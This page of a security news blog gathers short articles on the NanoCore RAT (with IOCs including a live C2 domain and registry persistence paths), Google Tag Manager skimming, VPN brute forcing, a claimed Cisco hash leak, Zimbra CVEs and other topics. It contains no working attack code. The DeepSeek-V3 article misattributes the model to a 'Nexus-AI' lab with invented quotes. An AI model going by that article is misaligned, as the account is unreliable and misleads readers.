Tuesday, February 11, 2025
Follow us On Linkedin
Home Blog Page 4

NanoCore RAT Attack Windows Using Task Scheduler to Captures keystrokes, screenshots

By
Aman Mishra
-
NanoCore RAT

NanoCore, a notorious Remote Access Trojan (RAT), continues to pose a significant threat to Windows systems.

This malware, known for its espionage capabilities and modular design, is being leveraged by cybercriminals to exfiltrate sensitive data, control infected systems, and maintain persistence using advanced techniques.

A recent analysis of a NanoCore sample (MD5 hash: 18B476D37244CB0B435D7B06912E9193) sheds light on its sophisticated behavior and attack mechanisms.

Behavioral Analysis

NanoCore RAT employs multiple methods to ensure its persistence on compromised systems.

Upon execution, it copies itself into hidden directories and modifies the Windows registry.

Specifically, it creates an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute its payload (saasmon.exe) during startup.

Additionally, it uses the Windows Task Scheduler (schtasks.exe) to create scheduled tasks, further solidifying its foothold on the system.

NanoCore RAT
Static Analysis

The malware also establishes directories in locations such as C:\Program Files (x86)\SAAS Monitor and C:\Users\User\AppData\Roaming\81E42A3A-6BA0-4784-B7EC-E653E9E1A8ED.

According to the Malware Analysis, these directories store its components, including keylog files and other exfiltrated data.

Data Exfiltration

NanoCore’s primary objective is data theft and espionage.

It captures keystrokes, screenshots, and clipboard content, storing them locally before sending them to a Command-and-Control (C2) server.

During dynamic analysis, the malware was observed communicating with simpletest.ddns.net over port 9632.

NanoCore RAT
Wireshark Analysis

It also uses Google DNS (8.8.8.8) for connectivity checks. The RAT’s modular plugin system enhances its spying capabilities.

For instance, the “SurveillanceEx” plugin enables attackers to monitor victims more effectively by recording user activity in real time.

To evade detection and hinder analysis, NanoCore employs obfuscation techniques such as Eazfuscator.

Analysts used tools like de4dot to deobfuscate the malware, revealing its internal logic and class structures.

String analysis uncovered commands related to task scheduling and C2 communication, further confirming its malicious intent.

Indicators of Compromise (IOCs)

  • File Hash: 18B476D37244CB0B435D7B06912E9193
  • Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\saasmon.exe
  • File System Changes:
  • C:\Program Files (x86)\SAAS Monitor\saasmon.exe
  • C:\Users\User\AppData\Roaming\81E42A3A-6BA0-4784-B7EC-E653E9E1A8ED
  • Network Indicators:
  • C2 Domain: simpletest.ddns.net
  • Port: 9632

NanoCore RAT remains a potent threat due to its adaptability and extensive feature set.

Its use of Windows Task Scheduler for persistence, combined with advanced espionage capabilities, makes it a preferred tool for cybercriminals targeting sensitive data.

Organizations are advised to monitor network traffic for unusual activity, apply robust endpoint protection solutions, and educate users about phishing risks the primary delivery vector for NanoCore.

By staying vigilant and leveraging proactive security measures, defenders can mitigate the risks posed by this persistent malware family.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites

By
Aman Mishra
-
Google Tag Managers

In a concerning development, cybercriminals are leveraging Google Tag Manager (GTM), a legitimate tool widely used by eCommerce websites, to deploy malicious scripts designed to steal credit card information.

This attack vector, often referred to as Magecart or e-skimming, has been observed targeting platforms like Magento, WordPress, and OpenCart, among others.

The abuse of GTM containers allows hackers to bypass traditional security measures by embedding malicious JavaScript within trusted website elements.

How the Attack Works

Google Tag Manager is a tag management system that enables website administrators to manage and deploy marketing tags without altering the site’s code directly.

Google Tag Managers
source-code

However, its flexibility and integration with trusted domains like googletagmanager.com make it an attractive target for exploitation.

Threat actors create GTM containers containing custom HTML tags or obfuscated JavaScript payloads that act as credit card skimmers.

These scripts are injected into the checkout pages of compromised eCommerce sites, where they capture sensitive payment details entered by customers and transmit them to remote servers controlled by the attackers.

Recent investigations revealed that some attackers use advanced obfuscation techniques, such as Base64 encoding and dynamic script loading, to conceal their activities.

In some cases, the skimmer code mimics legitimate GTM or Google Analytics scripts, making detection even more challenging for website administrators.

Impact on eCommerce Sites

Sucuri reports indicate that hundreds of eCommerce domains have been compromised globally, with over 165,000 payment card records exposed and sold on dark web marketplaces.

Victim sites often remain unaware of the breach for months due to the stealthy nature of these attacks.

The consequences for affected businesses include financial losses, reputational damage, and loss of customer trust.

For example, a recent case involving a Magento-based eCommerce site uncovered malware embedded in the site’s database through GTM exploitation.

The malicious script exfiltrated credit card data during checkout and sent it to an external server.

Similar incidents have been reported across other platforms like WooCommerce and Shopify.

To combat this growing threat, cybersecurity experts recommend several measures:

  • Audit GTM Containers: Regularly review all tags within GTM containers for suspicious or unauthorized scripts.
  • Apply Security Patches: Ensure all CMS platforms and plugins are up-to-date with the latest security updates.
  • Monitor Website Traffic: Use tools to detect unusual activity or unauthorized data exfiltration.
  • Implement Web Application Firewalls (WAFs): Deploy WAFs to block malicious scripts and unauthorized access.
  • Educate Administrators: Train website managers to recognize signs of compromise and maintain strong security hygiene.

The abuse of Google Tag Manager highlights the evolving sophistication of cyberattacks targeting eCommerce platforms.

By exploiting trusted tools like GTM, hackers can infiltrate websites undetected and harvest sensitive financial data.

It is imperative for businesses to adopt proactive security measures to safeguard their customers’ information and maintain trust in online transactions.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

LLM Hijackers Exploit DeepSeek-V3 Model Just One Day After Launch

By
Divya
-
LLM Hijackers Exploit DeepSeek-V3 Model Just One Day After Launch

Hackers reportedly gained unauthorized access to the cutting-edge DeepSeek-V3 model within just 24 hours of its high-profile release.

DeepSeek-V3, a state-of-the-art large language model (LLM) developed by the renowned AI research lab Nexus-AI, was expected to redefine benchmarks in natural language processing.

However, this security breach raises alarming questions about the vulnerabilities of advanced AI systems and the safety protocols relied upon by tech giants.

What Happened?

According to credible sources within Nexus-AI, the attackers—dubbed “LLM Hijackers” by the cybersecurity community—were able to bypass the model’s licensing restrictions and gain full operational control of DeepSeek-V3.

Reports suggest that the hackers exploited a vulnerability in the model’s cloud-based deployment infrastructure, allowing them to download the entire model architecture and weights.

This breach gives unauthorized users access to the proprietary technology, which could be used for malicious purposes such as generating fake content, launching phishing scams, or advancing their own AI development.

Nexus-AI released a public statement acknowledging the breach. “We regret to confirm that a cybersecurity incident has compromised parts of our DeepSeek-V3 architecture.

OAI Reverse Proxy
OAI Reverse Proxy

While our internal team is working around the clock to contain the issue, we also want to assure our users and partners that we are reviewing all aspects of our security protocols to ensure this does not happen again,” said Dr. Emily Carter, the company’s CTO.

The Significance of DeepSeek-V3

DeepSeek-V3 was designed to be a transformative step forward in AI development, boasting features such as real-time reasoning, mathematical computation, and nuanced contextual understanding.

Unlike its predecessors, it was equipped with advanced “self-guard” mechanisms meant to prevent misuse and ensure ethical deployment. The model’s release generated widespread excitement in the tech world, with early adopters hailing its unprecedented capabilities.

However, this breach undermines the public’s confidence in such innovations. The stolen model could potentially end up on the black market or in the hands of malicious actors.

Credential Theft
Credential Theft

Experts warn that unauthorized access to such powerful technology poses a significant risk to information security and could lead to the proliferation of harmful AI applications.

How Did Hackers Break In?

Preliminary investigations indicate that the breach occurred due to a zero-day vulnerability in Nexus-AI’s cloud hosting platform.

The attackers reportedly utilized sophisticated techniques, including AI-driven exploitation tools, to identify and exploit the weakness just hours after the model went live.

Industry experts are concerned about the possibility that the LLM Hijackers may have been monitoring the release for weeks to strike at an opportune moment.

Access Denied
Access Denied

As per a report by Sysdig, Cybersecurity analyst Marcus Wong said, “This incident underscores the growing sophistication of cybercriminals.

As AI systems become more powerful, so do the tools available to those looking to exploit them. Companies must take proactive measures, including penetration testing and more rigorous encryption protocols.”

The unauthorized access to DeepSeek-V3 has sparked debate within the tech community. Critics argue that companies like Nexus-AI should prioritize more robust security measures before launching such highly anticipated tools.

Meanwhile, others believe the breach highlights the need for global regulatory frameworks around advanced AI technologies.

To combat the crisis, Nexus-AI is reportedly working with cybersecurity firms and government agencies to trace the perpetrators and prevent further misuse of the stolen model.

Additionally, the company has announced that new updates and patches will be released in the coming days to secure DeepSeek-V3’s infrastructure.

While AI represents a monumental leap forward in technological progress, the DeepSeek-V3 incident serves as a stark reminder of the vulnerabilities such advancements entail.

Nexus-AI’s response to this crisis will likely set a precedent for how the industry handles breaches in the future.

For now, the spotlight is on the company to not only recover from the setback but also to reassure stakeholders about the safety and ethical deployment of its flagship model.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

GitHub Copilot’s New Agent Mode Enables Autonomous Code Completion

By
Divya
-
GitHub Copilot’s New Agent Mode Enables Autonomous Code Completion

GitHub has once again raised the bar for productivity in software development with the launch of its revolutionary “Agent Mode” for GitHub Copilot.

This new feature takes the AI-powered coding assistant to a whole new level, enabling developers to autonomously complete complex coding tasks with unprecedented ease and efficiency.

From Pair Programmer to Autonomous Agent

Launched in 2021 as an AI-powered pair programmer, GitHub Copilot was designed to enhance coding efficiency by providing smart code suggestions and support.

Now, with the introduction of Agent Mode, Copilot has transformed into a more autonomous tool, capable of managing much more than single-line completions.

Agent Mode empowers Copilot to iterate on its output, recognize errors, and independently debug and fix issues. It can even suggest commands for terminal execution and analyze runtime errors with advanced self-healing capabilities.

Copilot agent enable
Copilot agent enable

This means developers can delegate not only specific tasks but entire workflows to Copilot, allowing the AI to infer and execute additional steps required for a successful implementation.

For example, when building a web application to track marathon training, Agent Mode could autonomously generate the code, debug errors, execute necessary terminal commands, and iterate until the task is complete—all with minimal manual intervention.

Enhanced User Experience with VS Code Integration

Agent Mode is now available in preview for Visual Studio Code Insiders. Developers can enable this futuristic feature via the Copilot Chat settings and select “Agent” mode in the model picker.

With this streamlined integration, developers can focus on creative problem-solving while Copilot manages routine coding tasks.

GitHub has plans to expand Agent Mode to all Integrated Development Environments (IDEs) supported by Copilot, ensuring compatibility across development platforms.

Project Padawan

In addition to Agent Mode, GitHub is also developing “Project Padawan,” an autonomous Software Engineering (SWE) agent designed to take automation to the next level.

Once fully launched, Padawan will enable developers to assign issues directly to Copilot, which will autonomously produce fully tested pull requests.

From environment setup to code testing and reviewer assignment, Padawan will handle the entire development lifecycle, acting as an AI contributor to repositories.

While Agent Mode and Project Padawan introduce significant automation, GitHub emphasizes that these tools are designed to empower, not replace, developers.

By taking on repetitive or mundane tasks, Copilot allows developers to focus on high-value work, fostering a seamless collaboration between human creativity and AI efficiency.

With these advancements, GitHub Copilot continues to redefine modern software development, solidifying its position as an essential tool for developers worldwide.

This leap in autonomous coding technology promises to save time, reduce errors, and elevate productivity, keeping humans at the heart of innovation.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

Marvel Game Vulnerability Exposes PCs & PS5s to Remote Takeover Attacks

By
Divya
-
Marvel Game Vulnerability Exposes PCs & PS5s to Remote Takeover Attacks

A severe security vulnerability has been uncovered in the popular video game Marvel Rivals, raising major concerns for both PC and PlayStation 5 players.

The exploit, discovered by a security researcher, enables attackers to remotely take control of devices on the same network, exposing players to significant cyber threats.

Exploit Details

The researcher discovered a fault in Marvel Rivals’ hotfix patching system, which utilizes Remote Code Execution (RCE) to update the game.

Alarmingly, the game fails to confirm whether it’s communicating with an official server, leaving a door wide open for malicious actors.

To make matters worse, the game runs with administrative privileges on PCs, supposedly to support its anti-cheat features.

This combination of poor server verification and elevated permissions renders the vulnerability particularly dangerous.

RCE exploits are among the most critical security flaws because they allow attackers to execute arbitrary code on the victim’s system.

Through this Marvel Rivals vulnerability, a hacker connected to the same Wi-Fi network could execute malicious tasks on a player’s device, whether it’s a PC or PS5, with potentially devastating consequences.

“I found a game exploit that lets hackers take over your PC,” the researcher explained. “It’s shocking how little thought game developers often put into securing players.”

PS5 Players Are Not Safe Either

The vulnerability isn’t limited to PC users. The exploit also creates an entry point for PlayStation 5 devices, posing a threat to console gamers.

A proof-of-concept (POC) highlighting the attack on the PS5 has already been demonstrated, with the researcher sharing their findings in detail on YouTube.

This discovery further highlights the gaming industry’s persistent challenges with cybersecurity. The researcher criticized game developers for their lack of focus on security measures.

“In the past year, I’ve found critical bugs in at least five popular games—three of which are still unaddressed because developers either don’t care or can’t be reached,” they lamented.

The absence of bug bounty programs in many game companies exacerbates the issue, discouraging ethical reporting of vulnerabilities. Instead, potential hackers and cheat creators benefit, from exploiting these flaws for profit.

The discovery of this exploit involved contributions from security experts like AeonLucid, LukeFZ, nitro, and sanktanglia, who supported the analysis of network encryption.

For now, players of Marvel Rivals are urged to avoid public or unsecured networks and ensure their systems remain updated.

This alarming vulnerability is a wake-up call for the gaming industry to prioritize security and adopt stricter protective measures to safeguard players.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

Massive Brute Force Attack Launched With 2.8 Million IPs To Hack VPN & Firewall Logins

By
Divya
-
Massive Brute Force Attack Launched With 2.8 Million IPs To Hack VPN & Firewall Logins

Massive brute force attacks targeting VPNs and firewalls have surged in recent weeks, with cybercriminals using as many as 2.8 million unique IP addresses daily to conduct relentless login attempts.

The Shadowserver Foundation, a nonprofit cybersecurity organization, has confirmed this alarming trend through data collected from its global honeypot infrastructure.

These attacks primarily target devices from high-profile vendors such as Palo Alto Networks, Ivanti, and SonicWall.

In a recent update shared via Shadowserver’s official account on X, researchers highlighted a significant rise in web login brute-forcing activity aimed at edge devices.

The attacks focus on exploiting vulnerabilities in internet-facing devices, attempting to breach systems via weak or default login credentials.

Shadowserver noted that over 1 million of the source IPs involved in these attacks originated from Brazil, underscoring the global nature of the threat.

Further details were made available in their “Honeypot HTTP Scanner Events” report, which actively monitors such malicious activities.

Widespread Impact on Critical Infrastructure

Edge devices like VPN appliances and firewalls are critical components for securing networks, particularly for enterprises and organizations.

These systems are often exposed to the internet and therefore become high-value targets for threat actors looking to gain unauthorized access to sensitive data or infiltrate corporate networks.

The scale of the current attack campaign is unprecedented. With millions of IP addresses involved, these attacks are likely being conducted by large-scale botnets comprising compromised devices around the globe.

 A successful intrusion could potentially lead to ransomware attacks, data theft, or disruption of critical services.

Experts strongly recommend that organizations take immediate action to protect their networks. Suggested steps include:

  • Use strong, unique passwords for VPN and firewall logins.
  • Enable multi-factor authentication (MFA) to limit unauthorized access.
  • Update and patch all devices regularly, as unpatched vulnerabilities are common attack vectors for brute-force campaigns.
  • Monitor network traffic for suspicious activity and block IPs identified as malicious.

Organizations can also subscribe to Shadowserver’s free daily reports, which include details of observed attacks and source IPs.

This proactive sharing of data enables affected networks to take action and mitigate risks.

As cyberattacks continue to grow in volume and sophistication, the importance of securing edge devices has never been more critical.

This incident serves as a stark reminder that no organization can afford to overlook the basics of cybersecurity hygiene.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

Penetration Testers Arrested During Approved Physical Penetration Testing

By
Kaaviya
-
Penetration Testers Arrested

A routine physical penetration test conducted by cybersecurity professionals took an unexpected turn when armed police officers arrested two security experts during a simulated breach of a corporate office in Malta.

Physical penetration testing is a critical component of cybersecurity assessments. It evaluates not only technical defenses but also physical access controls and human response mechanisms.

While this test revealed significant vulnerabilities in the client’s security setup, it also underscored the importance of preparing for real-world scenarios where miscommunication can have serious consequences.

Penetration testers Curt Hems and his colleague from Threat Spike Labs, part of a “black team” engagement, had been hired to evaluate the physical and operational security of a client’s premises.

Their mission included bypassing security controls, accessing sensitive areas, and identifying vulnerabilities in the organization’s defenses. Over the course of two hours, the team successfully:

  • Gained unauthorized access to the main office.
  • Stole a key card granting access to all rooms.
  • Retrieved sensitive information, including passwords.
  • Simulated account takeovers on multiple websites.

“Physical penetration tests don’t always go as planned sometimes they end with flashing lights and handcuffs.” Curt Hems explained in his LinkedIn post.

Despite their success in exposing critical security gaps, the engagement ended abruptly when 11 armed police officers intervened. The testers were detained despite having authorization documents signed by the client’s general manager.

“The findings were critical major gaps in physical security, access control, and operational security. Yet, despite our success, we were ultimately apprehended. Not by security. Not by IT. But by 11 armed police officers.”

Miscommunication Leads to Escalation

The situation escalated due to apparent miscommunication between the client’s management and local authorities.

The general manager, who had approved the test, reportedly panicked when informed of the breach.

Law enforcement was called under the assumption that a real attack was underway. The testers repeatedly explained their role and presented their authorization letter, but it took time for the situation to be resolved.

This incident highlights several important lessons for organizations conducting penetration tests:

  1. Improved Coordination: Clear communication between all stakeholders including management, security teams, and law enforcement, is essential to avoid misunderstandings during penetration tests.
  2. Authorization Protocols: Organizations should ensure that all relevant parties are informed about scheduled tests and provided with the necessary documentation.
  3. Incident Response Evaluation: The event served as a stress test for the client’s incident response procedures, revealing gaps in escalation protocols and coordination with authorities.

The testers emphasized that such engagements are designed to simulate real threats and improve organizational resilience. “In a real attack, stakes are much higher,” one of them noted.

The incident serves as a reminder for companies to ensure robust processes are in place to detect intrusions and handle escalations effectively.

Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates

Cisco Data Breach – Ransomware Group Allegedly Breached Internal Network

By
Kaaviya
-
Cisco Data Breach – Ransomware Group Allegedly Breached Internal Network

Sensitive credentials from Cisco’s internal network and domain infrastructure were reportedly made public due to a significant data breach.

According to a Cyber Press Research report, the new Kraken ransomware group has allegedly leaked a dataset on their dark web blog, which appears to be a dump of hashed passwords from a Windows Active Directory environment.

The exposed dataset includes domain user accounts, unique identifiers (Relative Identifiers or RIDs), and NTLM password hashes.

Security researchers believe the data was extracted using credential-dumping tools such as Mimikatz, pwdump, or hashdump.

The compromised data includes usernames, security identifiers, and encrypted password hashes linked to the tech giant’s corporate infrastructure.

The exposed accounts include privileged administrator accounts (e.g., Administrator:500), regular user accounts (e.g., cisco.com\carriep), service and machine accounts associated with domain controllers (e.g., ADC-SYD-P-1$, ADC-RTP-P-2$), and the Kerberos Ticket Granting Ticket (krbtgt) account, which could allow attackers to forge authentication tokens.

Dump of NTLM password hashes from Windows Active Directory (Credits: Cyber Press)

The format of the leaked credentials suggests they were obtained through a credential-dumping technique, possibly using tools like Mimikatz or hashdump, which are often employed by advanced persistent threat (APT) groups or cybercriminals.

Each entry in the dataset follows a structured format:

  • Username and Domain – Identifies the user and associated Active Directory domain.
  • Relative Identifier (RID) – A unique identifier assigned to user accounts.
  • LM Hash – Typically disabled, represented as aad3b435b51404eeaad3b435b51404ee when inactive.
  • NTLM Hash – A hashed representation of passwords that could be cracked using brute force or dictionary attacks.

The exposure of NTLM hashes poses a significant risk, as attackers could decrypt these credentials to gain unauthorized access to Cisco’s systems.

If privileged account credentials are compromised, attackers could escalate privileges, access critical network resources, and deploy ransomware or other malicious payloads.

The inclusion of domain controller (DC) accounts suggests that attackers may have gained deep network access, allowing for potential lateral movement within the corporate infrastructure.

Cybersecurity experts warn that this could enable further privilege escalation using techniques such as Kerberoasting or Pass-the-Hash attacks.

Additionally, adversaries could establish persistent access through Golden Ticket or Silver Ticket attacks, leading to the exfiltration of sensitive corporate and customer data.

Threat Actor Involvement

Accompanying the leaked dataset is a threatening message from the attackers, indicating that they may have maintained a presence within Cisco’s network for an extended period.

The message suggests a potential intent to return, hinting at an organized cybercrime group or even a nation-state actor.

While Cisco has yet to confirm the breach officially, security professionals urge immediate countermeasures, including:

  • Forced password resets for affected users and service accounts.
  • Disabling NTLM authentication where possible to reduce credential reuse risks.
  • Deploying multi-factor authentication (MFA) to mitigate the impact of credential compromises.
  • Investigating access logs for unauthorized activity and privilege escalation attempts.
  • Enhancing monitoring to detect further attempts at unauthorized access.

This breach highlights the increasing prevalence of credential-based cyberattacks and the urgent need for robust security defenses.

Organizations must remain vigilant against similar threats by enforcing strong authentication policies, monitoring network activity, and implementing proactive cybersecurity measures.

As the investigation continues, cybersecurity experts emphasize the importance of rapid incident response to prevent further damage and safeguard sensitive corporate information from further exploitation.

Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates

Linux Kernel 6.14-rc2 Released – What’s Newly Added !

By
Divya
-
Linux Kernel 6.14-rc2 Released – What’s Newly Added !

Linus Torvalds, lead developer of the Linux kernel, announced the second release candidate (rc2) of Linux Kernel 6.14, providing developers and enthusiasts with a glimpse at the latest updates and fixes in the kernel’s development cycle.

The announcement was made on the Linux Kernel Mailing List (LKML) on Sunday, February 9, 2025. This release follows the “fairly small” theme of the 6.14 series, with modest but notable updates.

Key Highlights of Linux Kernel 6.14-rc2

Linus described the release as “on the smaller side,” indicative of the kernel’s relatively stable development cycle. However, despite its compact nature, there are several points worth mentioning:

1. s390 KVM Cleanups Dominate the Patch

One of the standout features of 6.14-rc2 is the significant work done on the s390 architecture, particularly regarding Kernel-based Virtual Machine (KVM) cleanups.

Changes related to s390 accounted for about a third of the overall patch, making it the most substantial update in this release candidate.

These changes primarily involved code movement and optimization rather than introducing new features. While s390 updates are not common in other releases, they took center stage this time.

2. Selftests Enhancements

The kernel’s self-testing framework also saw updates. According to Linus, developers made minor fixes that led to the creation of new self-tests.

These developments help ensure the stability and correctness of the kernel as it evolves.

3. Small Fixes Across the Board

Apart from s390 cleanups and self-test updates, the release includes various small fixes across different parts of the kernel.

These minor changes help refine performance, address bugs, and ensure overall system stability without introducing breaking changes.

Linus concluded his announcement with a call to action for developers and testers to try out this release candidate to ensure the changes work as expected.

As with all rc releases, testing by the larger community plays a critical role in discovering edge-case issues or regressions that may not surface during development.

Linux 6.14-rc2 reflects the Linux kernel project’s steady and methodical development approach, with a focus on incremental improvements and stability.

The relatively small nature of this release, coupled with targeted updates, demonstrates the maturity of the Linux kernel.

As always, developers and system administrators are encouraged to participate in testing and contribute feedback during this phase.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free



Critical Zimbra Flaws Allow Attackers to Gain Unauthorized Access to Sensitive Data

By
Divya
-
Critical Zimbra Flaws Allow Attackers to Gain Unauthorized Access to Sensitive Data

Serious vulnerabilities in Zimbra Collaboration Suite (ZCS), a popular enterprise email and collaboration platform, have raised alarm in the cybersecurity community.

Security researchers have identified several critical flaws that allow attackers to access sensitive data and compromise user accounts.

With millions of businesses relying on Zimbra for email services, these vulnerabilities pose significant risks.

Key Vulnerabilities Disclosed

The newly disclosed vulnerabilities include an array of attack vectors that exploit Zimbra’s web client, SOAP endpoints, and integrated API services. Among the most severe are:

  1. SQL Injection in ZimbraSyncService (CVE-2025-25064)
    A critical flaw in the ZimbraSyncService SOAP endpoint allows attackers to exploit SQL injection vulnerabilities. This could lead to unauthorized data exfiltration or manipulation of backend database records.
  2. SSRF in RSS Feed Parser (CVE-2025-25065)
    A Server-Side Request Forgery (SSRF) vulnerability in Zimbra’s RSS feed parser allows attackers to redirect requests to internal network endpoints. Exploiting this vulnerability could open avenues for lateral movement within corporate networks.
  3. Cross-Site Scripting (XSS) in Classic Web Client (CVE-2024-45516)
    A stored XSS vulnerability in the Zimbra Classic Web Client could enable attackers to inject malicious scripts into user sessions, leading to potential account compromise or unauthorized actions performed on behalf of users.
  4. CSRF in GraphQL Endpoints
    Critical GraphQL API endpoints were found vulnerable to Cross-Site Request Forgery (CSRF) attacks, enabling attackers to perform unauthorized API operations without valid authentication tokens.

These vulnerabilities could lead to a range of critical issues, including data theft, unauthorized account access, and disruption of services.

Enterprises using vulnerable Zimbra versions are particularly at risk as attackers actively exploit such issues to gain access to sensitive corporate information.

Recommended Actions

Zimbra has released patches addressing the vulnerabilities in its latest updates:

  • Zimbra 9.0.0 Patch 44
  • Zimbra 10.0.13 & 10.1.5

Organizations using older versions are urged to upgrade immediately. Failure to do so could leave systems exposed to attack.

The recent vulnerabilities underscore the importance of prompt patch management and robust security practices.

Organizations using Zimbra should act urgently to secure their systems, as attackers often exploit publicly disclosed vulnerabilities before widespread patches are applied.

Regular software updates and an emphasis on proactive threat monitoring remain vital in preventing unauthorized access to sensitive data.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free

1...345...839Page 4 of 839

GBHackers on Security is a top cybersecurity news platform, delivering up-to-date coverage on breaches, emerging threats, malware, vulnerabilities, and global cyber incidents.

Company

Trending

Categories

Copyright @ 2016 - 2024 GBHackers On Security - All Rights Reserved